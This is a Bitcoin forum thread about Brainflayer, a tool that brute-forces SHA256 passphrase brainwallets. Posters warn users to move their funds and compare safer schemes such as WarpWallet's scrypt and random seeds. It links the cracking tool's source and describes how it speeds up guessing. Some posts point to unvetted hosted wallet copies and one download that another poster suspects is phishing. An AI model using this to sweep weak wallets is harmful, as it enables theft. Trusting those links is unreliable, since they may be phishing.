Bitcoin Forum

In light of recent events, it has been proven that BrainWallet is now no longer regarded as safe.  At Defcon 23 (running August 6-9 2015), a whitehat hacker (named Ryan) released a program (codenamed Brainflayer) capable of checking 10s of thousands of brainwallets per second.  During his research, he discovered private keys for addresses that at some point held over 730BTC.  Many of the phrases were regarded as generally safe.  However, they were still cracked by his program.  BrainWallet as a whole is now being regarded as unsafe for use.  While experts have considered it unsafe for a long time, this is one of the first practical implementations that proves exactly how unsafe they are as a wallet choice.

Following the announcement and presentation of the software implementation, BrainWallet's website has been shut down.  The latest commit on their GitHub page removed the website and replaced it with a parked page, saying that the project is now closed.

However, there are still many safe BrainWallets.  As of now, it is recommended that you clean the balance out of your BrainWallet and into a safer storage method.  It is important to note that Ryan, the developer of this program, did not take any of the bitcoins.  He attempted to alert the owner of 250BTC that their bitcoins are at risk.  However, he has not personally gained anything from this, and works for the betterment of the bitcoin community.

While many BrainWallet cracking tools have existed over time, Brainfalyer is many orders of magnitude faster.  It uses Bloom Filters to effectively and quickly check if addresses have been used, which increases its speed.  Various other optimizations have made is very efficient as well.  In the next months, it can be expected that other hackers will be creating botnets, and various other large scale attacks against brain wallets.  It is no longer safe to use a BrainWallet.  Transfer funds out immediately!

The presentation regarding general information about the attack is available on Ryan's website. (https://rya.nc/cracking_cryptocurrency_brainwallets.pdf)
The source code for the project is available on GitHub (https://github.com/ryancdotorg/brainflayer)

If you are one of the lucky BrainWallet users who have not haven your bitcoins stolen, we have hosted the BrainWallet code on our website.  It can be used to transfer your bitcoins to a safer medium.  A Trezor or Electrum (http://electrum.org) (cold storage) wallet is recommended for users with larger amounts of bitcoin.  They are easy to set up, and are many times safer than your BrainWallet.  To use the BrainWallet software, go to our website's hosting of BrainWallet (http://brainwallet.bitforwarder.com).  For smaller amounts of bitcoin, you can use the website implementation itself.  For larger amounts, click the "Download ZIP" button in the footer of the website.  From there, you can generate the private key and transfer your bitcoins before theft occurs.

Please do not take this warning lightly.  Over 730BTC were available for theft thoughout the history of BrainWallet.  Please ensure that your bitcoins are not part of the ones that are taken in the future.  Save your bitcoins today, and transfer them to a safe storage system such as a Trezor or an Electrum Cold Storage wallet.

I were robbed of 22BTC by most likely a brainwallet cracker is there any chance I could get my BTC back for more info check my thread https://bitcointalk.org/index.php?topic=1146935.0 (https://bitcointalk.org/index.php?topic=1146935.0)

What is the BrainWallet string used to create that address?  I'll check if it's in his list of notable hacks.

I do not remember the string but maybe you can check for an address it is 1JqL1fp2nfuoSKirnRLjqUbQpf7Pou7mXR.

Check my thread you'll find all the answers.I have the private key for the address.

I want to be absolutely clear - other than by accident (and those coins were returned within minutes) - I have not taken anyone's bitcoins. I will be following up with a blog post sharing more details of my research soon.

You could try asking btcrobinhood on reddit - they have a bot that sweeps brainwallets. I believe that their policy is to return 100% if you are able to demonstrate ownership sufficiently.

I would consider helping to recover forgotten brainwallet passphrases (using a tailored search), but I don't have a policy on this at the moment.

So you mean you not only don't have my BTC you don't have anyone's BTC?So who is that whitehat who has 800BTC.I already messaged robinhood but he didn't seem to post for months.And I don't need to get my passphrase back I have a private key of that wallet.

i'm glad we have a white hacker like you. you inform us about bug on brain wallet and didn't steal anyone bitcoin.
mostly people will take their bitcoin if they found the bug, but you are not. thanks to you.

I originally thought there was a backdoor to the key generation algorithm. After reading the PDF, I believe it's boarder list generation and more efficient way of checking balance. At the end, boils down to weak phrases: Brainwallet users believe they can created a phrase that no one could ever think of.  ;D

I don't use brainwallets because I do not trust myself with remembering the phrase. If I need to write it down, it defeats the purpose of using brainwallets.

I was never a fan of brainwallet... The idea sounded too insecure to me. I hope those seed words used by electrum are safer.

If you memorize Electrum seed, it will be a brainwallet. ::) ;)

btcspry said that based on a misunderstanding of some sort. What I said was that I ran a "peak balance analysis" on all the brainwallets I cracked, and the total was about 733 BTC. This does not reflect the balances they had when I found them - it's the most they ever held. I do not know how much of this was moved out by the legitimate owners and how much was stolen.

There's a couple of things people use the term "brainwallet" to mean.

1. The weak cryptocurrency private key generation scheme of SHA256(passphrase)

2. Brainwallet.org, a site implementing the SHA256(passphrase) algorithm as well as some miscellaneous tools

3. Any scheme turning a user chosen passphrase into a cryptocurrency private key

4. Any scheme where a user memorizes a generated passphrase representing a cryptocurrency private key

Brainflayer specifically targets number one in that list.

Different type of brainwallet.  You seem like the kind of person who shows up at a crane convention, and while everyone else has a little bird, you show up with this giant crane for lifting things.

The brainwallet in this case refers to those generated by Brainwallet.org (which uses SHA256(passphrase) to generate the private key).

On paper, the idea of Brainwallet sounded great. But the biggest problem is the human element in the equation :)

If you remove the human part, you're stuck with a third party.

There is no proper implementation to do this in a trustless environment.

Yeah, but as far as I know it can't be cracked as easy as brainwallet.org keys. That's what I was questioning

The problem is that BrainWallets don't implement a random number generator in any way.  That's the thing that pretty much every other wallet implementation has in common - they don't trust the user to supply the piece that everything is generated from.

So no news for my Bitcoins?

No, not really.  Someone else stole them.  It is very unlikely that it was BrainWallet's operators who stole them, so it simply can be concluded that you just used a weak passphrase to generate the wallet.

ryanc, I would like to see more documentation about brainflayer as there is almost none.

In regards a commentary you made in your presentation on how to advert people that they have a weak address. You said that it could be thought sending a small amount to a vanity address but you could send it to a burn address like '1DontUseThisWeakBrainWa11etAf1F98T'. Here (https://gist.github.com/CoinWhisperer/6d673f1f3d13da1611cd) you have a python scrypt for generating them, also check the bitcoin address validation (http://rosettacode.org/wiki/Bitcoin/address_validation) wiki entry.

The initial release of brainflayer deliberately has very limited documentation to keep unskilled people from using it. I will be releasing an enhanced version (with better documentation) soon, now that it's made some news and convinced some people to stop using brainwallets.


This would pollute the UTXO set, and I don't think it's really any better than using multiple vanity addresses in the same transaction. I was going for subtle at the time.

Wow. Just read about this tonight. Experimenting with Brain Wallet and found an empty wallet with 2 previous transactions.

It's true. People have no imaginations   :/

edit ... up to 4 now ..  ;D all empty though
edit.. make that 6 ...

I have several times changed the source of https://brainwalletx.girhub.io/ for supporting a different coins,
but now I was not too lazy and took the time to write a universal brainwallet for all coins.
You can download test it here "CКAЧATЬ": http://rgho.st/8hlwbSy98
1. Unzip to the folder.
2. Drag and drop index.html -> to the tab of your browser.
3. See changes.txt

Just for you all I did add random_seed and XOR
and also I did unlock the "Secure random" button (just found it in the source code).  Grin

Maybe need to add or change anything else? Just PM me.

Out of curiosity, where does the vulnerability originate? Is it in the seed phrase itself, or the way it makes use of the seed phrase? This is important because I noticed that with electrum wallets it will accept any seed phrase I give it meaning that I could technically just think up my own seed phrase to use the same way I'd use a brain wallet. If the issue is with the 12 word seeds it would mean that no seed wallet is safe, but if the issue is something else I'd like to know what that is and what if anything it might mean for other wallets. 

Cant make up my mind if this is phishing or an honest typo, but the rating suggests phisher!

I plan to release an update adding support for this "passphrase plus xor" brainwallet variant, so don't go using it.

What's your take on WarpWallet?

https://keybase.io/warp

Using a single step plain hash for brain wallets is definitely a bad idea. But I like the WarpWallet approach.

So far it has stood the test of time even with a password of just 8 alpha-numeric characters. (not even salt)

The key difference is that there are so many iterations instead of a single hash that brute-forcing those keys would not really be feasible (yet). Also you have the option of adding a salt.

There are still 10 BTC sitting there as a reward to whoever can guess the 8 alphanumeric characters. (this one has pre-defined salt)

Don't use WarpWallet, the manual key management is a nightmare, and it uses uncompressed addresses. Just memorize a random 12 word seed phrase.

Do you mean "The WarpWallet Challenge 2"? Check the address, the 10 BTC was moved out in January 2018. The text also says that the challenge expires 1st Jan 2018.

https://www.blockchain.com/btc/address/1MkupVKiCik9iyfnLrJoZLx9RH4rkF3hnA

actually the main difference is in usage of a key derivation function called "scrypt" which is a memory expensive KDF and with decent settings it can become very expensive to break. N=2¹⁸ and r=8 are the "cost" that are making it expensive since you are basically deriving a 1024 byte long key and then mixing it in 8 blocks, 2¹⁸ times then deriving another key with that mixed key both times using PBKDF2.
by the way the "s2" variable it uses is quite pointless in my opinion, they could have just increase block size factor from 8 to a bigger value!

and finally i have to mention that even with this much complication, this implementation is also suffering from the same flaws as any other brain wallet: people are not capable of creating a truly random password. most of them will use simple terms which can be found/guesses easily.
setting a couple of complicated passwords as challenge doesn't mean the method is safe. you could do the same thing with other brainwallets too!

Hehheh. Open-source. Where you can see any phishing in the source code?
I did host it using github-pages, here: https://username1565.github.io/brainwallet.github.io/
Source code - here: https://github.com/username1565/brainwallet.github.io/

Best regards.

Agree that the s2 variable is pointless. The point I was making was that this is a much safer brain wallet, given that people don't use easy to guess input.
I'd still prefer WarpWallet to remembering 12 words. You can use things you'd never forget for master & salt, but are not that common or easy to guess.
There is no way you can remember 12 words for years to come without writing them somewhere. Which also means that they could easily be stolen or lost.


Yes, they should've generated compressed keys, but that can be fixed easily.


Right. They had the prior challenge for 2 years, and it wasn't cracked until the expiration date.

true but as i explained, the alternative is still flawed so in my opinion storing the 12 words that is randomly generated is a lot safer than using a brainwallet even if it is susceptible to physical theft.
besides you can mitigate that by using some sort of encryption on it! for instance you could use the "brainwallet" as the password for encrypting the mnemonic phrase and then print the encrypted text instead and remember the password.

This words can be encrypted by password, and saved in LocalStorage, in browser, like a seed on WAVES DEX (https://client.wavesplatform.com/#!/dex-demo?assetId2=BS1KFNR8zrXKBEWdUUvpaP6G57Hic3aESkwK7qQKdLpB&assetId1=WAVES).

---

Sometimes, warpwallet working good for me,
but sometimes, I see the "throw error" in console of my browser, when I try to run this WARPWALLET (https://keybase.io/warp/):

Someone can explain this, and repair?

That is a fine idea!

What I don't like is using a simple SHA for a password. So even the password protected mnemonics if they fall in the wrong hands could easily be brute-forced.

So here is a thought perhaps we'd both agree on - what about WarpWallet type of encryption on top of the mnemonic phrases?

extending the password with a salt first and then using that for encryption is always a great idea. extending it with a strong key derivation function that is expensive to brute force such as scrypt (which uses a lot of memory) is even a better idea. setting the values for N=2¹⁸ and r=8 is also a good setting for this purpose https://tools.ietf.org/html/rfc7914#section-2

Seems to me you can stretch and obfuscate as much as you want, but you will never solve a couple of fundamental problems:

1. The original passphrase will still have lower entropy than a sequence of random bytes.

2. The more complicated you make the passphrase->rawkey generation process, the more likely you (or the beneficiaries in your will) are to lose funds.

It's interesting proposing new ways to make a brainwallet more secure, and I get that there are some extraordinary situations where use of a brainwallet may be justified, but otherwise... wouldn't you be better off sticking with something more conventional like a paper wallet?

Am I understanding this correctly? You are saying that using scrypt with N=2¹⁸ and r=8 is just as good as WarpWallet, thus WarpWallet isn't achieving much by doing ton of iterations?


Good points! I'm not suggesting using ONLY brain wallets. I just don't think they should be entirely dismissed because they were badly implemented at first.

I know this is more of a movie script than real life scenario, but interesting nonetheless:

Suppose somehow you are in a third world country robbed and left with nothing and you have a stash you can access via brain wallet just by passphrase and a salt.

(And I DON'T like that WarpWallet uses email for the salt, but could be anything that you are likely to remember forever)

it is about at what layer this is being used.

* if scrypt is used to generate the mnemonic from a passphrase as it is with WarpWallet and brain wallets, it is a bad idea because even if it is a memory expensive KDF it still doesn't solve the problem of people using simple passwords and the attacker does NOT have to have access to anything to steal their coins. all they have to do is to iterate over most common words and rob them. look at this: https://bitcointalk.org/index.php?topic=4768828.0 it obviously will take a lot longer than SHA256 but it will not be impossible. if there is incentive, they will do it.

* but if it is used only for the encryption step, the attacker first has to gain physical access to your paper wallet for example and then attempt brute forcing that. so in this case scrypt is only used as one of the many security layers you are putting in place.

Hi  ryanc !

Can you send me PM ?

Someone forked Warp Wallet to spit out a 12 word seed (as well as the extended private key), but still haven't found one that directly goes to segwit addresses. You could do a multi-step procedure to use a randomly generated password to spit out yprivs and zprivs if you like to have a segwit brainwallet.

I found these:
https://github.com/Logicwax/PortalWallet <= used older Warp Wallet code, and doesn't have segwit.
https://www.nowallet.org/

The only use-case for a pure brainwallet, as others have mentioned, is when escaping a country or government or warzone with only the clothes on your back. Even in this case, you can probably sew on embroidered password under your clothes or otherwise write it down somewhere on your person.

Is this "XOR implementation" really that useless (considering XOR + Warp Wallet variant)?

Thanks @Dabs for mentioning nowallet.org

I just brought back from the ashes my old list of brainwallet projects here: https://bitcointalk.org/index.php?topic=1164163.0 (https://bitcointalk.org/index.php?topic=1164163.0)

So I'm catching up all those yet operational and working projects...

Yeah, no problem. I have a bunch of older paper wallet generators, some don't exist anymore due to the website disappearing (or removing the files). In the end I'm fairly convinced that using Electrum or one of those Electrum compatible seed generators using your own entropy (if you like to flip coins or roll dice) is more convenient.

I agree 100%!

Generating your own seed/passphrase using diceware (coin flipper, card shuffler, etc) is the safest way to go for sure...

But playing with brainwallets is still enjoyable! (For study purposes of course)  ::)

If you know any other project that I didn't mention on my list, please share!

Cheers!

Where I can find my wallet

 well check how much is 22 BTC now